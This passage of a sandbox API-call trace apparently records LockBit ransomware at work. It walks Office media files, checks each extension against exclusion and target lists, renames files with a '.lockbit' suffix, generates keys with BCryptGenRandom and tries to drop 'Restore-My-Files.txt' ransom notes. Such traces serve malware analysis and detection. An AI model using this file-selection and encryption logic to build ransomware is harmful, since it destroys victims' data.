lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.007] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.008] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.008] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.008] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.008] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF.lockbit") returned 76 [0210.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21336_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0210.010] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.010] malloc (_Size=0x40068) returned 0x3d70450 [0210.010] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2795) returned 1 [0210.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0210.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0210.011] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0210.018] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.018] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.018] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.020] free (_Block=0x1fa2ed8) [0210.020] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21336_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.020] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.020] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ae24200, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdeeda0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1ae24200, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21338_.GIF", cAlternateFileName="")) returned 1 [0210.020] lstrcmpiW (lpString1=".", lpString2="BD21338_.GIF") returned -1 [0210.020] lstrcmpiW (lpString1="..", lpString2="BD21338_.GIF") returned -1 [0210.020] PathFindExtensionW (pszPath="BD21338_.GIF") returned=".GIF" [0210.020] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.020] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.020] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.021] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.021] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.022] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.022] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.022] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.022] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.023] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.023] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21338_.GIF") returned 1 [0210.023] lstrcmpiW (lpString1="ntldr", lpString2="BD21338_.GIF") returned 1 [0210.023] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21338_.GIF") returned 1 [0210.023] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21338_.GIF") returned 1 [0210.023] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21338_.GIF") returned -1 [0210.023] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21338_.GIF") returned 1 [0210.023] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21338_.GIF") returned 1 [0210.023] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.023] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF") returned=".GIF" [0210.023] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.023] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.023] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.023] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.024] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.024] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.024] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.024] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.024] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.024] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.024] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF.lockbit") returned 76 [0210.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21338_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0210.026] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.026] malloc (_Size=0x40068) returned 0x3e70008 [0210.026] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=836) returned 1 [0210.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0210.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0210.027] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0210.031] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.031] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.031] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.033] free (_Block=0x1fa2ed8) [0210.033] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21338_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.033] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.033] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.033] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a537400, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbce14f00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7a537400, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21340_.GIF", cAlternateFileName="")) returned 1 [0210.033] lstrcmpiW (lpString1=".", lpString2="BD21340_.GIF") returned -1 [0210.033] lstrcmpiW (lpString1="..", lpString2="BD21340_.GIF") returned -1 [0210.033] PathFindExtensionW (pszPath="BD21340_.GIF") returned=".GIF" [0210.033] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.033] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.034] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.034] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.035] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.035] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.035] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.035] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.035] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.036] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21340_.GIF") returned 1 [0210.036] lstrcmpiW (lpString1="ntldr", lpString2="BD21340_.GIF") returned 1 [0210.036] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21340_.GIF") returned 1 [0210.036] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21340_.GIF") returned 1 [0210.036] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21340_.GIF") returned -1 [0210.036] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21340_.GIF") returned 1 [0210.036] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21340_.GIF") returned 1 [0210.036] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.036] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF") returned=".GIF" [0210.036] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.036] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.036] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.036] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.037] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.037] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.037] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.037] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.037] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF.lockbit") returned 76 [0210.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21340_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0210.039] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.039] malloc (_Size=0x40068) returned 0x3ef0008 [0210.039] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=150) returned 1 [0210.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0210.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0210.040] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0210.041] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.041] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.041] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.042] free (_Block=0x1fa2ed8) [0210.042] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21340_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.043] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.043] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.043] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7a89600, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbce3b060, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa7a89600, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x46b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21348_.GIF", cAlternateFileName="")) returned 1 [0210.043] lstrcmpiW (lpString1=".", lpString2="BD21348_.GIF") returned -1 [0210.043] lstrcmpiW (lpString1="..", lpString2="BD21348_.GIF") returned -1 [0210.043] PathFindExtensionW (pszPath="BD21348_.GIF") returned=".GIF" [0210.043] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.043] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.043] lstrcmpiW (lpString1=".msp", 